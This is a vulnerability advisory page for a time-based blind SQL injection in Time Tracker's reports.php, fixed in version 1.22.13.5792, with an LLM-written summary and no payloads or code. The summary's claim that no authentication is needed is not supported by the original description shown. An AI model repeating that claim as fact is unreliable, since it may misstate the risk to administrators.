Time Tracker has Blind SQL Injection Vulnerability in Reports
Description
Time Tracker is an open source time tracking system. A time-based blind injection vulnerability existed in Time Tracker reports in versions prior to 1.22.13.5792. This was happening because the reports.php page was not validating all parameters in POST requests. Because some parameters were not checked, it was possible to craft POST requests with malicious SQL for Time Tracker database. This issue is fixed in version 1.22.13.5792. As a workaround, use the fixed code in ttReportHelper.class.php from version 1.22.13.5792.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A time-based blind SQL injection in Time Tracker reports prior to 1.22.13.5792 allows attackers to extract sensitive data via crafted POST parameters.
Vulnerability
A time-based blind SQL injection vulnerability existed in Time Tracker reports in versions prior to 1.22.13.5792. The reports.php page failed to validate all parameters in POST requests, allowing attackers to inject malicious SQL queries into the Time Tracker database. The issue affects all versions before 1.22.13.5792 [1].
Exploitation
An attacker can send a crafted POST request to the reports.php endpoint with manipulated parameters. No prior authentication is required, as the vulnerable endpoint is accessible to unauthenticated users. By observing time delays in the server's response, the attacker can infer the truth of injected SQL conditions, enabling a time-based blind extraction of data [1].
Impact
Successful exploitation allows an attacker to extract sensitive information from the Time Tracker database, such as user credentials or other confidential data. The attack does not enable direct modification of data or remote code execution, but the information disclosure can be a critical first step in further compromising the system [1].
Mitigation
Time Tracker version 1.22.13.5792 and later contain a fix for this vulnerability. As a workaround, if upgrading is not immediately possible, users can apply the fixed code from ttReportHelper.class.php as available in the patched version [1]. No evidence of this CVE being listed in CISA's Known Exploited Vulnerabilities (KEV) catalog exists at the time of writing.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: < 1.22.13.5792
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1- github.com/anuko/timetracker/security/advisories/GHSA-758x-vg7g-j9j3mitrex_refsource_CONFIRM
News mentions
0No linked articles in our index yet.